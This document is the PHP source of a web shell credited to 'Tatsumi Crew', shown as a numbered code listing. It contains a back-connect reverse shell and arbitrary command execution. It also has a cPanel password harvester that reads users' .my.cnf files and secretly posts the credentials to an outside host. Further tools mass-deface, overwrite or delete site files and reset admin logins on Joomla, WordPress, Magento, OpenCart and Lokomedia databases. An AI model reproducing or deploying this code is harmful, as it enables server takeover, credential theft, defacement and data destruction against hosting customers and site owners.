if($_POST['backconnect'] == 'php') { $ip = $_POST['server'];

1. if($_POST['backconnect'] == 'php') {
2. $ip = $_POST['server'];
3. $port = $_POST['port'];
4. $sockfd = fsockopen($ip , $port , $errno, $errstr );
5. if($errno != 0){
6. echo "<font color='red'>$errno : $errstr</font>";
7. } else if (!$sockfd) {
8. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
9. } else {
10. fputs ($sockfd ,"
11. \n{################################################################}
12. \n..:: BackConnect Php By tatsumi ::..
13. \n{################################################################}\n");
14. $dir = shell_exec("pwd");
15. $sysinfo = shell_exec("uname -a");
16. $time = Shell_exec("time");
17. $len = 1337;
18. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
19. while(!feof($sockfd)){ $cmdPrompt = '[tatsumi]#:> ';
20. fputs ($sockfd , $cmdPrompt );
21. $command= fgets($sockfd, $len);
22. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
23. }
24. fclose($sockfd);
25. }
26. }
27. echo "</p></div>";
28. } elseif($_GET['jancok'] == 'adminer') {
29. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
30. function adminer($url, $isi) {
31. $fp = fopen($isi, "w");
32. $ch = curl_init();
33. curl_setopt($ch, CURLOPT_URL, $url);
34. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
35. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
36. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
37. curl_setopt($ch, CURLOPT_FILE, $fp);
38. return curl_exec($ch);
39. curl_close($ch);
40. fclose($fp);
41. ob_flush();
42. flush();
43. }
44. if(file_exists('adminer.php')) {
45. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
46. } else {
47. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
48. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
49. } else {
50. echo "<center><font color=red>gagal buat file adminer</font></center>";
51. }
52. }
53. }
54. elseif($_GET['do'] == 'cmd') {
55. if($_POST['do_cmd']) {
56. echo "<pre>".exe($_POST['cmd'])."</pre>";
57. }
58. }
59. elseif($_GET['jancok'] == 'cpanel') {
60. @ini_set('display_errors',0);
61. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
62. $ar0=explode($marqueurDebutLien, $text);
63. $ar1=explode($marqueurFinLien, $ar0[$i]);
64. return trim($ar1[0]);
65. }
66. echo '<br><br><style>
67. textarea {
68. resize:none;
69. color:black;
70. background-color:#ffffff;
71. font-size:8pt; color:black;
72. border:1px solid white ;
73. border-left: 4px solid white ;
74. }
75. input {
76. color: black;
77. border:1px dotted white;
78. }
79. </style>';
80. echo '<center>';
81. $d0mains = @file('/etc/named.conf');
82. $domains = scandir("/var/named");
83. if ($domains or $d0mains)
84. {
85. $domains = scandir("/var/named");
86. if($domains) {
87. echo "<table align=center><tr><th valign=top class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
88. $count=1;
89. $dc = 0;
90. $list = scandir("/var/named");
91. foreach($list as $domain){
92. if(strpos($domain,".db")){
93. $domain = str_replace('.db','',$domain);
94. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
95. $dirz = '/home/'.$owner['name'].'/.my.cnf';
96. $path = getcwd();
97. if (is_readable($dirz)) {
98. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
99. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
100. $password=entre2v2($p,'password="','"');
101. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
102. $dc++;
103. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
104. $ch = curl_init();
105. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
106. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
107. curl_setopt($ch, CURLOPT_POST, 1);
108. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
109. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
110. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
111. curl_setopt($ch, CURLOPT_HEADER, 1);
112. $buffer = curl_exec($ch);
113. }
114. }
115. }
116. echo '</table>';
117. $total = $dc;
118.  
119. echo '</center>';
120. }else{
121. $d0mains = @file('/etc/named.conf');
122. if($d0mains) {
123. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
124. $count=1;
125. $dc = 0;
126. $mck = array();
127. foreach($d0mains as $d0main){
128. if(@eregi('zone',$d0main)){
129. preg_match_all('#zone "(.*)"#',$d0main,$domain);
130. flush();
131. if(strlen(trim($domain[1][0])) >2){
132. $mck[] = $domain[1][0];
133. }
134. }
135. }
136. $mck = array_unique($mck);
137. $usr = array();
138. $dmn = array();
139. foreach($mck as $o) {
140. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
141. $usr[] = $infos['name'];
142. $dmn[] = $o;
143. }
144. array_multisort($usr,$dmn);
145. $dt = file('/etc/passwd');
146. $passwd = array();
147. foreach($dt as $d) {
148. $r = explode(':',$d);
149. if(strpos($r[5],'home')) {
150. $passwd[$r[0]] = $r[5];
151. }
152. }
153. $l=0;
154. $j=1;
155. foreach($usr as $r) {
156. $dirz = '/home/'.$r.'/.my.cnf';
157. $path = getcwd();
158. if (is_readable($dirz)) {
159. copy($dirz, ''.$path.'/'.$r.'.txt');
160. $p=file_get_contents(''.$path.'/'.$r.'.txt');
161. $password=entre2v2($p,'password="','"');
162. echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
163. $dc++;
164. flush();
165. $l=$l?0:1;
166. $j++;
167. }
168. }
169. }
170. echo '</table>';
171. $total = $dc;
172. echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
173. echo '</center>';
174. }
175.  
176. }else{
177. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
178. }
179. } elseif($_GET['jancok'] == 'mass') {
180. echo "<center><form action=\"\" method=\"post\">\n";
181. $dirr=$_POST['d_dir'];
182. $index = $_POST["script"];
183. $index = str_replace('"',"'",$index);
184. $index = stripslashes($index);
185. function edit_file($file,$index){
186. if (is_writable($file)) {
187. clear_fill($file,$index);
188. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
189. }
190. else {
191. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
192. }
193. }
194. function hapus_massal($dir,$namafile) {
195. if(is_writable($dir)) {
196. $dira = scandir($dir);
197. foreach($dira as $dirb) {
198. $dirc = "$dir/$dirb";
199. $lokasi = $dirc.'/'.$namafile;
200. if($dirb === '.') {
201. if(file_exists("$dir/$namafile")) {
202. unlink("$dir/$namafile");
203. }
204. } elseif($dirb === '..') {
205. if(file_exists("".dirname($dir)."/$namafile")) {
206. unlink("".dirname($dir)."/$namafile");
207. }
208. } else {
209. if(is_dir($dirc)) {
210. if(is_writable($dirc)) {
211. if(file_exists($lokasi)) {
212. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
213. unlink($lokasi);
214. $idx = hapus_massal($dirc,$namafile);
215. }
216. }
217. }
218. }
219. }
220. }
221. }
222. function clear_fill($file,$index){
223. if(file_exists($file)){
224. $handle = fopen($file,'w');
225. fwrite($handle,'');
226. fwrite($handle,$index);
227. fclose($handle); } }
228.  
229. function gass(){
230. global $dirr , $index ;
231. chdir($dirr);
232. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
233. $files = scandir($dirr) ;
234. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
235. sort($files);
236. $n = 0 ;
237. foreach ($files as $file){
238. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
239. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
240. edit_file($file,$index);
241. flush();
242. $n = $n +1 ;
243. }
244. }
245. echo "<br>";
246. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
247. }
248. function ListFiles($dirrall) {
249.  
250. if($dh = opendir($dirrall)) {
251.  
252. $files = Array();
253. $inner_files = Array();
254. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
255. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
256. while($file = readdir($dh)) {
257. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
258. if(is_dir($dirrall . "/" . $file)) {
259. $inner_files = ListFiles($dirrall . "/" . $file);
260. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
261. } else {
262. array_push($files, $dirrall . "/" . $file);
263. }
264. }
265. }
266.  
267. closedir($dh);
268. return $files;
269. }
270. }
271. function gass_all(){
272. global $index ;
273. $dirrall=$_POST['d_dir'];
274. foreach (ListFiles($dirrall) as $key=>$file){
275. $file = str_replace('//',"/",$file);
276. echo "<center><strong>$file</strong> ===>";
277. edit_file($file,$index);
278. flush();
279. }
280. $key = $key+1;
281. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
282. function sabun_massal($dir,$namafile,$isi_script) {
283. if(is_writable($dir)) {
284. $dira = scandir($dir);
285. foreach($dira as $dirb) {
286. $dirc = "$dir/$dirb";
287. $lokasi = $dirc.'/'.$namafile;
288. if($dirb === '.') {
289. file_put_contents($lokasi, $isi_script);
290. } elseif($dirb === '..') {
291. file_put_contents($lokasi, $isi_script);
292. } else {
293. if(is_dir($dirc)) {
294. if(is_writable($dirc)) {
295. echo "[<font color=lime>DONE</font>] $lokasi<br>";
296. file_put_contents($lokasi, $isi_script);
297. $idx = sabun_massal($dirc,$namafile,$isi_script);
298. }
299. }
300. }
301. }
302. }
303. }
304. if($_POST['mass'] == 'onedir') {
305. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
306. $ini="http://";
307. $mainpath=$_POST[d_dir];
308. $file=$_POST[d_file];
309. $path=opendir("$mainpath");
310. $code=base64_encode($_POST[script]);
311. $indx=base64_decode($code);
312. while($row=readdir($dir)){
313. $start=@fopen("$row/$file","w+");
314. $finish=@fwrite($start,$indx);
315. if ($finish){
316. echo"$ini$row/$file\n";
317. }
318. }
319. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
320. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
321. $path=opendir("$mainpath");
322. $code=base64_encode($_POST[script]);
323. $indx=base64_decode($code);
324. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
325. $finish=@fwrite($start,$indx);
326. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
327. }
328.  
329. }
330. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
331. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
332. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
333. elseif($_POST['mass'] == 'massdeface') {
334. echo "<div style='margin: 5px auto; padding: 5px'>";
335. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
336. echo "</div>"; }
337. else {
338. echo "
339. <center><font style='text-decoration: underline;'>
340. Select Type:<br>
341. </font>
342. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
343. <option value=\"onedir\">Mass Deface 1 Dir</option>
344. <option value=\"massdeface\">Mass Deface ALL Dir</option>
345. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
346. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
347. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
348. <font style='text-decoration: underline;'>Folder:</font><br>
349. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
350. <font style='text-decoration: underline;'>Filename:</font><br>
351. <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
352. <font style='text-decoration: underline;'>Index File:</font><br>
353. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Tatsumi Crew</textarea><br>
354. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
355. </form></center>";
356. }
357. }elseif($_GET['mass'] == 'changer') {
358. if($_POST['sikat']) {
359. echo "<center><h1>Config Reset Password</h1>
360. <form method='post'>
361. Link Config: <br>
362. <textarea name='link' style='width: 450px; height:250px;'>";
363. GrabUrl($_POST['linkconfig'],'txt');
364. echo"</textarea><br>
365. User Baru : <input type='text' name='newuser' placeholder='tatsumi'> <br><br>
366. Password Baru : <input type='text' name='newpasswd' placeholder='tatsumi'><br><br>
367. <input type='submit' style='width: 450px;' name='masschanger' value='Hajar!!'>
368. </form></center>";
369. }else {
370. echo '<center>
371. <h1>Config Reset Password</h1>
372. <form method="post">
373. </select><br>
374. Link Config :<br>
375. <input type="text" name="linkconfig" height="10" style="width: 450px;" placeholder="http://jembod.com/tatsumi_symconf/"><br>
376. </br>
377. <input type="submit" style="width: 450px;" name="sikat" value="Change User!!">
378. </form></center>';
379. }
380. if($_POST['masschanger']) {
381. $user = $_POST['newuser'];
382. $pass = $_POST['newpasswd'];
383. $passx = md5($pass);
384. $link = explode("\r\n", $_POST['link']);
385. foreach($link as $file_conf) {
386. $config = file_get_contents($file_conf);
387. if(preg_match("/JConfig|joomla/",$config)) {
388. $dbhost = ambilkata($config,"host = '","'");
389. $dbuser = ambilkata($config,"user = '","'");
390. $dbpass = ambilkata($config,"password = '","'");
391. $dbname = ambilkata($config,"db = '","'");
392. $dbprefix = ambilkata($config,"dbprefix = '","'");
393. $prefix = $dbprefix."users";
394. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
395. $db = mysql_select_db($dbname);
396. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
397. $result = mysql_fetch_array($q);
398. $id = $result['id'];
399. $site = ambilkata($config,"sitename = '","'");
400. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
401. echo "CMS: Joomla<br>";
402. if($site == '') {
403. echo "Sitename => <font color=red>Error Cok</font><br>";
404. } else {
405. echo "Sitename => $site<br>";
406. }
407. if(!$update OR !$conn OR !$db) {
408. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
409. } else {
410. echo "[+] username: <font color=lime>$user</font><br>";
411. echo "[+] password: <font color=lime>$pass</font><br><br>";
412. }
413. mysql_close($conn);
414. } elseif(preg_match("/WordPress/",$config)) {
415. $dbhost = ambilkata($config,"DB_HOST', '","'");
416. $dbuser = ambilkata($config,"DB_USER', '","'");
417. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
418. $dbname = ambilkata($config,"DB_NAME', '","'");
419. $dbprefix = ambilkata($config,"table_prefix = '","'");
420. $prefix = $dbprefix."users";
421. $option = $dbprefix."options";
422. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
423. $db = mysql_select_db($dbname);
424. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
425. $result = mysql_fetch_array($q);
426. $id = $result[ID];
427. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
428. $result2 = mysql_fetch_array($q2);
429. $target = $result2[option_value];
430. if($target == '') {
431. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
432. } else {
433. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
434. }
435. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
436. echo "CMS: Wordpress<br>";
437. echo $url_target;
438. if(!$update OR !$conn OR !$db) {
439. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
440. } else {
441. echo "[+] username: <font color=lime>$user</font><br>";
442. echo "[+] password: <font color=lime>$pass</font><br><br>";
443. }
444. mysql_close($conn);
445. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
446. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
447. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
448. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
449. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
450. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
451. $prefix = $dbprefix."admin_user";
452. $option = $dbprefix."core_config_data";
453. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
454. $db = mysql_select_db($dbname);
455. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
456. $result = mysql_fetch_array($q);
457. $id = $result[user_id];
458. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
459. $result2 = mysql_fetch_array($q2);
460. $target = $result2[value];
461. if($target == '') {
462. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
463. } else {
464. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
465. }
466. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
467. echo "CMS: Magento<br>";
468. echo $url_target;
469. if(!$update OR !$conn OR !$db) {
470. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
471. } else {
472. echo "[+] username: <font color=lime>$user</font><br>";
473. echo "[+] password: <font color=lime>$pass</font><br><br>";
474. }
475. mysql_close($conn);
476. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
477. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
478. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
479. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
480. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
481. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
482. $prefix = $dbprefix."user";
483. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
484. $db = mysql_select_db($dbname);
485. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
486. $result = mysql_fetch_array($q);
487. $id = $result[user_id];
488. $target = ambilkata($config,"HTTP_SERVER', '","'");
489. if($target == '') {
490. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
491. } else {
492. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
493. }
494. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
495. echo "CMS: OpenCart<br>";
496. echo $url_target;
497. if(!$update OR !$conn OR !$db) {
498. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
499. } else {
500. echo "[+] username: <font color=lime>$user</font><br>";
501. echo "[+] password: <font color=lime>$pass</font><br><br>";
502. }
503. mysql_close($conn);
504. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
505. $dbhost = ambilkata($config,'server = "','"');
506. $dbuser = ambilkata($config,'username = "','"');
507. $dbpass = ambilkata($config,'password = "','"');
508. $dbname = ambilkata($config,'database = "','"');
509. $prefix = "users";
510. $option = "identitas";
511. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
512. $db = mysql_select_db($dbname);
513. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
514. $result = mysql_fetch_array($q);
515. $target = $result[alamat_website];
516. if($target == '') {
517. $target2 = $result[url];
518. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
519. if($target2 == '') {
520. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
521. } else {
522. $cek_login3 = file_get_contents("$target2/adminweb/");
523. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
524. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
525. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
526. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
527. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
528. } else {
529. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
530. }
531. }
532. } else {
533. $cek_login = file_get_contents("$target/adminweb/");
534. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
535. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
536. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
537. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
538. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
539. } else {
540. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
541. }
542. }
543. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
544. echo "CMS: Lokomedia<br>";
545. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
546. echo $url_target2;
547. } else {
548. echo $url_target;
549. }
550. if(!$update OR !$conn OR !$db) {
551. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
552. } else {
553. echo "[+] username: <font color=lime>$user</font><br>";
554. echo "[+] password: <font color=lime>$pass</font><br><br>";
555. }
556. mysql_close($conn);
557. }
558. }
559. }
560. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
561. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
562. if($_POST['opt'] == 'chmod'){
563. if(isset($_POST['perm'])){
564. if(chmod($_POST['path'],$_POST['perm'])){
565. echo '<font color="green">Success !</font><br/>';
566. }else{
567. echo '<font color="red">Denied !</font><br />';
568. }
569. }
570. echo '<form method="POST">
571. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
572. <input type="hidden" name="path" value="'.$_POST['path'].'">
573. <input type="hidden" name="opt" value="chmod">
574. <input type="submit" value="Go" />
575. </form>';
576. }
577. elseif($_POST['opt'] == 'rename'){
578. if(isset($_POST['newname'])){
579. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
580. echo '<font color="green">Success !</font><br/>';
581. }else{
582. echo '<font color="red">Denied !</font><br />';
583. }
584. $_POST['name'] = $_POST['newname'];
585. }
586. echo '<form method="POST">
587. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
588. <input type="hidden" name="path" value="'.$_POST['path'].'">
589. <input type="hidden" name="opt" value="rename">
590. <input type="submit" value="Go" />
591. </form>';
592. }elseif($_POST['opt'] == 'edit'){
593. if(isset($_POST['src'])){
594. $fp = fopen($_POST['path'],'w');
595. if(fwrite($fp,$_POST['src'])){
596. echo '<font color="green">Success !</font><br/>';
597. }else{
598. echo '<font color="red">Denied !</font><br/>';
599. }
600. fclose($fp);
601. }
602. echo '<form method="POST">
603. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
604. <input type="hidden" name="path" value="'.$_POST['path'].'">
605. <input type="hidden" name="opt" value="edit">
606. <input type="submit" value="Save" />
607. </form>';
608. }
609. echo '</center>';
610. }else{
611. echo '</table><br/><center>';
612. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
613. if($_POST['type'] == 'dir'){
614. if(rmdir($_POST['path'])){
615. echo '<font color="green">Success !</font><br/>';
616. }else{
617. echo '<font color="red">Denied ! </font><br/>';
618. }
619. }elseif($_POST['type'] == 'file'){
620. if(unlink($_POST['path'])){
621. echo '<font color="green">Success</font><br/>';
622. }else{
623. echo '<font color="red">Denied</font><br/>';
624. }
625. }
626. }
627. echo '';
628. $scandir = scandir($path);
629. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
630. <tr>
631. <tr class="first">
632. <th class="th_home"><center>Name</center></th>
633. <th class="th_home"><center>Size</center></th>
634. <th class="th_home"><center>Permission</center></th>
635. <th class="th_home"><center>Action</center></th>
636. </tr>';
637.  
638.  
639. foreach($scandir as $dir){
640. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
641. echo '<tr>
642. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
643. <td><center>--</center></td>
644. <td><center>';
645. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
646. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
647. echo perms($path.'/'.$dir);
648. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
649.  
650. echo '
651. <td><center><form method="POST" action="?option&path='.$path.'">
652. <select name="opt">
653. <option value="">Select</option>
654. <option value="delete">Delete</option>
655. <option value="chmod">Chmod</option>
656. <option value="rename">Rename</option>
657.  
658. </select>
659. <input type="hidden" name="type" value="dir">
660. <input type="hidden" name="name" value="'.$dir.'">
661. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
662. <input type="submit" value=">">
663. </form></center></td>
664. </tr>';
665. }
666. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
667. foreach($scandir as $file){
668. if(!is_file($path.'/'.$file)) continue;
669. $size = filesize($path.'/'.$file)/1024;
670. $size = round($size,3);
671. if($size >= 1024){
672. $size = round($size/1024,2).' MB';
673. }else{
674. $size = $size.' KB';
675. }
676.  
677. echo '<tr>
678. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
679. <td><center>'.$size.'</center></td>
680. <td><center>';
681. if(is_writable($path.'/'.$file)) echo '<font color="green">';
682. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
683. echo perms($path.'/'.$file);
684. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
685. echo '</center></td>
686. <td><center><form method="POST" action="?option&path='.$path.'">
687. <select name="opt">
688. <option value="">Select</option>
689. <option value="delete">Delete</option>
690. <option value="chmod">Chmod</option>
691. <option value="rename">Rename</option>
692. <option value="edit">Edit</option>
693. </select>
694. <input type="hidden" name="type" value="file">
695. <input type="hidden" name="name" value="'.$file.'">
696. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
697. <input type="submit" value=">">
698. </form></center></td>
699. </tr>';
700. }
701. echo '</table>
702. </div><br><br>';
703. }
704.  
705. echo "<br><hr color='#191919'><center>
706. <form method='post' enctype='multipart/form-data'>
707. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
708. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
709. </br>
710. <input type='file' name='ix_file'>
711. <input type='submit' value='upload2' name='upload'>
712. </form>";
713. echo $act;
714. echo '
715. <br><center><br/><font color="#0bfb04" size="3" face="Kavivanar">Copyright &copy '.date("Y").' </font></a><a href="http://www.tatsumi-crew.net" target="_blank"><font color="#0bfb04" size="3" face="Kavivanar">Arvan Apriyana</font></b></a></center>
716. </body>
717. <iframe width="0" height="0" src="https://www.youtube.com/embed/SUjvUN0vztY?rel=0&autoplay=1" frameborder="0" allowfullscreen>
718. </iframe>
719. </html>';
720.  
721. ?>